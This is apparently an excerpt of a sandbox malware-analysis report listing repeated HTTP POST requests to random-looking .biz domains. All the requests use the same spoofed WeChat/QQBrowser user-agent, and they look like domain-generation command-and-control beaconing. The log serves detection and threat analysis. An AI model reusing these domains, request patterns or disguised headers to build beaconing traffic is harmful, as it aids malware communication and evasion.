              Source: global trafficHTTP traffic detected: POST /ulhoa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /vbfsvakjwax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gwahjspinmwkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /wmdddjvyuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /kjomliy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gimbgsoaqvqvqhf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /tywwnha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /jkmxqkwmcvmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kyoprhcrfsm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /avcgsychncpte HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /udhgonlj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dumoc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /sq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ejbrogxxii HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /efgvahmdqrw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /fbtooofknamad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jftqxekje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ecrhfjlr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /jec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /kuwwkrnberw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /iwihrntolwnlxj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /quoefwkpxb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qwxttwlxqjtrapbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gkelppguisaups HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ldybnpdmgmce HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pkyl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /scdrs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yefflviaj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /flkouthsl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /pavcpmnglvwlhxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /oedtv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ifmlpkcljjt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /guxaecyjiiwu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /noy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ghy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /fxeavmrosc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hlcxi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /og HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ohyfmaqfmywges HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mavqlvnkyqsv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /qewfnkeilkg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /rnkfruqdkxfgjfwn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /yxaoh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /klhalpnmlsyrs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /hiqtpnauanelpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gxnuggiifqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cppxk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gbqdupu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wibvfidtxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ugprc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qnguomsjnupgml HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bxvadfmcs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /lvwolspodwinvctf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /wcf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cblcujxhilpbxlv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mchxsqvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dapmb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gmghpoftyccoynqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cnrdlkv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /sfjvwxnay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ojgeebrrbqmxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gtcagitskd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
